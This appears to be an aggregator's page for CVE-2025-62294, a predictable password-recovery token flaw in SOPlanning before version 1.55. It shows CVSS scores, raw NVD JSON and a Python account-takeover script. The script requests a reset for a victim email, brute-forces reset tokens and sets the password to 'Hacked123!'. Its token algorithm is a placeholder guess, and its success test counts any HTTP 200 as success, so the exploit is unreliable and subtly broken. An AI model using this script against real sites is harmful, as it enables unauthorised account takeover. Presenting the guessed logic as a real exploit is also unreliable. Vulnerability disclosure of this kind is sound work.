Security Vulnerability Report
中文
CVE-2025-62294 CVSS 7.5 HIGH

CVE-2025-62294

Published: 2025-11-20 16:15:59
Last Modified: 2025-11-24 13:51:23

Description

SOPlanning is vulnerable to Predictable Generation of Password Recovery Token. Due to weak mechanism of generating recovery tokens, a malicious attacker is able to brute-force all possible values and takeover any account in reasonable amount of time. This issue was fixed in version 1.55.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* - VULNERABLE
SOPlanning < 1.55

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import hashlib import time # CVE-2025-62294 PoC - SOPlanning Password Recovery Token Brute Force # Target: SOPlanning instance # Vulnerability: Predictable Password Recovery Token Generation TARGET_URL = "http://target-server/soplanning" TARGET_EMAIL = "[email protected]" def generate_predictable_token(user_id, timestamp): """ Generate potential tokens based on weak algorithm Replace with actual token generation logic discovered through analysis """ token_base = f"{user_id}:{timestamp}" return hashlib.md5(token_base.encode()).hexdigest() def request_password_reset(email): """ Request password reset for target email """ reset_url = f"{TARGET_URL}/user/password-forgotten.php" data = { "email": email, "submit": "1" } response = requests.post(reset_url, data=data) return response def brute_force_token(email, user_id): """ Brute force password reset token Note: This is for educational purposes only """ timestamp = int(time.time()) # Try tokens from past 1 hour to next 5 minutes for offset in range(-3600, 300, 60): potential_timestamp = timestamp + offset token = generate_predictable_token(user_id, potential_timestamp) verify_url = f"{TARGET_URL}/user/password-reset.php" data = { "email": email, "token": token, "new_password": "Hacked123!" } response = requests.post(verify_url, data=data) if "success" in response.text.lower() or response.status_code == 200: print(f"[+] Token found: {token}") print(f"[+] Password reset successful") return True return False # Main execution print("[*] CVE-2025-62294 - SOPlanning Token Prediction Attack") print(f"[*] Target: {TARGET_URL}") print(f"[*] Victim: {TARGET_EMAIL}") # Step 1: Request password reset response = request_password_reset(TARGET_EMAIL) if response.status_code == 200: print("[*] Password reset request sent successfully") # Step 2: Brute force the token brute_force_token(TARGET_EMAIL, user_id=1) else: print("[-] Failed to request password reset")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62294", "sourceIdentifier": "[email protected]", "published": "2025-11-20T16:15:59.243", "lastModified": "2025-11-24T13:51:22.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOPlanning is vulnerable to Predictable Generation of Password Recovery Token. Due to weak mechanism of generating recovery tokens, a malicious attacker is able to brute-force all possible values and takeover any account in reasonable amount of time.\n\nThis issue was fixed in version 1.55."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-340"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.55.00", "matchCriteriaId": "C84D5087-6ED4-47E4-9E68-F1881726E7D2"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2025/11/CVE-2025-62293", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.soplanning.org/en/", "source": "[email protected]", "tags": ["Product"]}]}}